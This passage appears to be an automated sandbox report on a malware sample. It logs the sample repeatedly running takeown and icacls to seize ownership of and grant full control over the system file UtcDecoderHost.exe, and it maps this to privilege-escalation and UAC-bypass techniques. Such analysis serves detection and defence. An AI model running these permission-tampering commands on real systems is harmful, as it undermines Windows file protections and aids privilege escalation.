C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:5660
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5712
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5724
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:5792
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5816
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5884
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5904
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:5920
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5972
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5980
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:5996
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:6004
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:6064
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:6092
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3176
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:3600
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4508
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:1624
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2632
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:4628
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2164
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:2804
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3708
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3476
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:2828
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3044
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:5284
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:264
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:2080
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4832
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:3076
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5016
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:3496
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5580
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:3552
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2248
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5960
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3864
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:5184
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:6108
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5912
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5188
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5328
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5396
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:5736
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1144
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5432
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5880
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:5464
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:5716
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5060
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5424
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:468
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2396
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:1484
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5888
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5700
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:6060
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:2484
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4484
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5384
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5476
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1608
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1432
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:5996 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1556
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4792
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:5660
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:6092
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5940
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:6120
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:5536
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:6124
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5160
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5820
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4832
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:1160
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1084
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:4508
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4312
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:2512
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1512
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:5196
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5132
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:3560
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5580
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5148
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3896
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:4496
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5936
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5516
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5780 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5188
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:5688
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3184 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3496
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5144
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1196
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:1088
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5836
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5184
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:3652
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5540
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:3400
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5656
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:5792
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:5524
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:3096
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:5856
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:2788
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4380
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:5828
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5968
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5352
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:436
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:744
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:3204
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:6000
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:5452
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5124
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5980
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:1624
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4468
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3176
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5712
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6020
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:1012
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5744
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5920
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2524
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:6108
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3132
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:3252
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3140
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5764
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5448
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:4228
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5596
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:2380
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4108
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:4248
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5444
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4428
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5200 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3812
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5012
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2056
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:1736
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3540
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5932
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:6072
-
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv ppQx/VIl0keqW2GSJ5P1sA.0.21⤵PID:1132
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:3560
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism 1
Bypass User Account Control 1
Event Triggered Execution 1
Change Default File Association 1
Downloads